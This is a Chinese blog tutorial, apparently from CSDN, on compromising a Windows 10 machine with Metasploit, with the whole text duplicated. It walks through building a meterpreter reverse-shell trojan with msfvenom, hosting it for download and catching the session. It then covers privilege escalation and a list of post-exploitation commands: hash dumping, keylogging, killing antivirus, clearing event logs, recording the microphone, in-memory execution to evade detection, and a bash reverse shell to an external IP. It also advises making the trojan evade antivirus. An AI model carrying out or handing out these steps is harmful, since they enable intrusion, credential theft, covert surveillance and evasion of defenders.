前言:学习网络技术 本环境自己搭建
声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。
kali ip 192.168.141.129
windwos10 192.168.141.128
一、木马生成
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机ip LPORT=本机端口 -f exe > shell.exe //保存到跟目录
二、开启apach服务 service apache2 start
查看状态 ervice apache2 status
接下来把我们的木马文件 上传到apach里面
cp shell.exe /var/www/html
三、客户端访问下载打开 注:关闭杀毒 或者允许
四、kali开启监听 msf
(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.141.129(填写自己主机的IP地址)
(4)命令: set lport 3333(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit // -z -j(后台执行)
五、进入win10系统
注:木马可以做免杀 ,不然杀毒软件 会杀掉
六、提权
咱们权限只有管理员权限 需要提权
会话保持在后台 background 命令
在拿到meterpreter会话的前提下,我们可以利用这个模块进行收集
use post/multi/recon/local_exploit_suggester
接下来 利用这些搜索出来的 利用exp提权
常见的提权模块如下:
ms14_058 内核模式驱动程序中的漏洞库能允许远程代码执行
ms16_016 WebDAV 本地提权漏洞(CVE-2016-0051)
ms16_032 MS16-032 Secondary Logon Handle 本地提权漏洞
常用提权命令
sysinfo 查看系统命令
migrate 注入进程
getuid 获取当前用户
getprivs 尽可能提升权限
getsystem 通过各种攻击向量来提升系统用户权限
可以先使用 getsystem 来自动提权,如果失败再手动提权
基础命令
ps 列出进程
sessions 查看会话
background 把session放置后台
sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
interact id #切换进一个信道
back 返回主界面
shell 得到终端
search搜索模块
show 列模块
info 查看模块信息
meterpreter > background 退出到msf命令提示符下
meterpreter > lpwd 等价于在kali上输入pwd
meterpreter > lcd /etc 等价于在kali上输入cd /etc
meterpreter > run post/windows/gather/smart_hashdump 获取目标主机上用户的hash值
meterpreter > run post/windows/capture/keylog_recorder 键盘记录
meterpreter > run killav 结束目标主机上的杀毒软件相关进程
meterpreter > clearev 清除系统日志
meterpreter > download boot.ini 下载目标主机上的boot.ini文件
meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32 上传
nc.exe到目标主机上。(注意要使用2个反斜杠)
meterpreter > dir windows\\system32\\nc.exe
meterpreter > execute -f nc -nvlp 3333 执行nc.exe
meterpreter > execute -f "bash -i >& /dev/tcp/104.199.1.1/82 0>&1"
meterpreter > execute -f bash -i -H
meterpreter > execute -f cmd.exe -i -H 获得目标主机的shell,-i交互模式,-H隐藏
meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt"
meterpreter > cat foo.txt
-m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查
杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。
meterpreter > getuid 查看当前用户
meterpreter > getsystem 提权到system用户
meterpreter > getprivs 查看当前用户具有的权限
meterpreter > getpid 查看meterpreter注入到了什么进程中
meterpreter > migrate 1436 更改到pid1436进程中
meterpreter > getpid 重新使用getpid命令查看
meterpreter > hashdump 获取目标主机上用户的hash值
meterpreter > sysinfo 查看目标系统的信息
meterpreter > kill 188 结束188进程
meterpreter > shell 获取目标操作系统的shell
meterpreter > idletime 查看目标主机已经空闲了多长时间
meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts 编辑hosts文件
meterpreter > record_mic -d 10 -f /root/桌面/1.mp4 监听麦克风
meterpreter > load python 加载python插件
后面一些操作
msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)__Cyber的博客-CSDN博客_msf键盘记录
前言:学习网络技术 本环境自己搭建
声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。
kali ip 192.168.141.129
windwos10 192.168.141.128
一、木马生成
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机ip LPORT=本机端口 -f exe > shell.exe //保存到跟目录
二、开启apach服务 service apache2 start
查看状态 ervice apache2 status
接下来把我们的木马文件 上传到apach里面
cp shell.exe /var/www/html
三、客户端访问下载打开 注:关闭杀毒 或者允许
四、kali开启监听 msf
(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.141.129(填写自己主机的IP地址)
(4)命令: set lport 3333(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit // -z -j(后台执行)
五、进入win10系统
注:木马可以做免杀 ,不然杀毒软件 会杀掉
六、提权
咱们权限只有管理员权限 需要提权
会话保持在后台 background 命令
在拿到meterpreter会话的前提下,我们可以利用这个模块进行收集
use post/multi/recon/local_exploit_suggester
接下来 利用这些搜索出来的 利用exp提权
常见的提权模块如下:
ms14_058 内核模式驱动程序中的漏洞库能允许远程代码执行
ms16_016 WebDAV 本地提权漏洞(CVE-2016-0051)
ms16_032 MS16-032 Secondary Logon Handle 本地提权漏洞
常用提权命令
sysinfo 查看系统命令
migrate 注入进程
getuid 获取当前用户
getprivs 尽可能提升权限
getsystem 通过各种攻击向量来提升系统用户权限
可以先使用 getsystem 来自动提权,如果失败再手动提权
基础命令
ps 列出进程
sessions 查看会话
background 把session放置后台
sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
interact id #切换进一个信道
back 返回主界面
shell 得到终端
search搜索模块
show 列模块
info 查看模块信息
meterpreter > background 退出到msf命令提示符下
meterpreter > lpwd 等价于在kali上输入pwd
meterpreter > lcd /etc 等价于在kali上输入cd /etc
meterpreter > run post/windows/gather/smart_hashdump 获取目标主机上用户的hash值
meterpreter > run post/windows/capture/keylog_recorder 键盘记录
meterpreter > run killav 结束目标主机上的杀毒软件相关进程
meterpreter > clearev 清除系统日志
meterpreter > download boot.ini 下载目标主机上的boot.ini文件
meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32 上传
nc.exe到目标主机上。(注意要使用2个反斜杠)
meterpreter > dir windows\\system32\\nc.exe
meterpreter > execute -f nc -nvlp 3333 执行nc.exe
meterpreter > execute -f "bash -i >& /dev/tcp/104.199.1.1/82 0>&1"
meterpreter > execute -f bash -i -H
meterpreter > execute -f cmd.exe -i -H 获得目标主机的shell,-i交互模式,-H隐藏
meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt"
meterpreter > cat foo.txt
-m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查
杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。
meterpreter > getuid 查看当前用户
meterpreter > getsystem 提权到system用户
meterpreter > getprivs 查看当前用户具有的权限
meterpreter > getpid 查看meterpreter注入到了什么进程中
meterpreter > migrate 1436 更改到pid1436进程中
meterpreter > getpid 重新使用getpid命令查看
meterpreter > hashdump 获取目标主机上用户的hash值
meterpreter > sysinfo 查看目标系统的信息
meterpreter > kill 188 结束188进程
meterpreter > shell 获取目标操作系统的shell
meterpreter > idletime 查看目标主机已经空闲了多长时间
meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts 编辑hosts文件
meterpreter > record_mic -d 10 -f /root/桌面/1.mp4 监听麦克风
meterpreter > load python 加载python插件
后面一些操作
msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)__Cyber的博客-CSDN博客_msf键盘记录